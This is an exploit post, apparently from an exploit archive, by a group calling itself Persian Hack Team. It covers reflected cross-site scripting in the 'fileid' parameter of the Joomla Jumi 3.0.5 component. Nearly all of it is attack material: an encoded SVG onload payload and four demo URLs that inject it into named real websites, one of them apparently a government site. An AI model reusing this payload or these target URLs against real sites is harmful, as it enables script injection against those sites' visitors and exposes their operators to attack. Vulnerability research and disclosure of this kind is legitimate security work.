Joomla Jumi 3.0.5 Cross Site Scripting

`######################  
# Exploit Title : Joomla Component com_jumi - Cross Site Scripting  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : http://extensions.joomla.org/extension/jumi  
# Category: [ Webapps ]  
# Tested on: [ Win ]  
# Date: 2016/05/26  
# Version : 3.0.5  
######################  
#   
# PoC:  
# fileid vulnerable to XSS   
# Payload = ">Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team  
# Demo :  
# http://www.ic.gov.sa/index.php?option=com_jumi&view=application&fileid=5%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team  
# http://www.starfilcas.com/index.php?option=com_jumi&view=application&fileid=3%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&Itemid=223&lang=en  
# http://www.ballhockeyone.com/index.php?option=com_jumi&view=application&fileid=47%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&Itemid=252  
# http://www.comunico.com/index.php?option=com_jumi&fileid=3%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&Itemid=80&svpage=programs_academic  
#  
######################  
# Discovered by : Mojtaba MobhaM   
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members  
# Homepage : persian-team.ir  
######################   
`